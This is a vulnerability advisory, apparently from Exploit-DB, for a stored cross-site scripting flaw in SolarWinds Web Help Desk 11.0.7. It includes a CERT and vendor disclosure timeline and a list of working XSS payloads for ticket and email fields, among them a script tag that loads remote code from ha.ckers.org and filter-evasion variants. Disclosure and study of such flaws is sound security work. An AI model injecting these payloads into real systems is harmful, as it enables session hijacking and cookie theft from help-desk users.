Stored XSS in Web Help Desk by SolarWinds

vendor:

Web Help Desk

by:

loneferret

7.5

CVSS

HIGH

Stored XSS

CWE

Product Name: Web Help Desk

Affected Version From: 11.0.7

Affected Version To: 11.0.7 (older versions may be affected)

Patch Exists: YES

Related CWE:

CPE: web-help-desk-by-solarwinds

Metasploit:

Other Scripts:

Platforms Tested:

2012

Stored XSS in Web Help Desk by SolarWinds

The Web Help Desk software by SolarWinds is affected by a stored cross-site scripting (XSS) vulnerability. The vulnerability can be exploited by submitting a malicious payload in the Subject and Request Details fields of the client web ticket submit system. Additionally, tickets created automatically via email can also trigger the XSS when viewed. The vulnerability allows an attacker to execute arbitrary script code in the context of the user's browser, potentially leading to session hijacking or the theft of sensitive information.

Mitigation:

Upgrade to a patched version of the software. No further details provided.

Source

Exploit-DB raw data:

# Author: loneferret of Offensive Security
# Product: Web Help Desk by SolarWinds
# Version: 11.0.7 (older versions may be affected)
# Vendor Site: http://www.webhelpdesk.com
# Software Download: http://www.webhelpdesk.com/help-desk-software/

# Discovered: August 18th 2012
# Disclosure:
# August 19th 2012: Reported to CERT
# August 24th 2012: Public disclosure date is October 8th 2012
# August 28th 2012: Vendor responded, should fix by disclosure date
# August 29th 2012: Vendor asked information on Stored XSS in 'Rejected E-Mail Section'
# August 29th 2012: Sent vendor instructions on how to trigger XSS (not fully documented here)*
# September 21 2012: Vendor sends pre-release version to test (11.0.8)
# September 23 2012: Replied. Still XSS in "Rejected E-Mail Section' but not in Tickets
# September 24 2012: Vendor replied saying "Rejected E-Mail" XSS slated to be fix in next version
# October 8th 2012: Public release

# Vulnerabilities:
# Stored XSS via client web ticket submit system
# Effected fields: Subject & Request Details
# Payload: <script>alert(document.cookie);</script>

# Stored XSS via E-Mail
# Tickets created automatically vis e-mail will also trigger the XSS when viewing.
# Following payloads are triggered with default regular expression filters 
# Body field
# Payloads:
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>  
<iframe SRC="javascript:alert('XSS Body');"></iframe>

# Subject field
# Payloads:
<BODY ONLOAD=alert('XSS')>**
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>  
<iframe SRC="javascript:alert('XSS Subject');"></iframe>

# *Viewing rejected e-mails via the 'email.eml' in the "Raw Message Data" section.
# Some payloads:
# <SCRIPT SRC=http://ha.ckers.org/xss.js>
# <XSS STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>

# **To trigger XSS must click on "My Tickets" or "Group Tickets"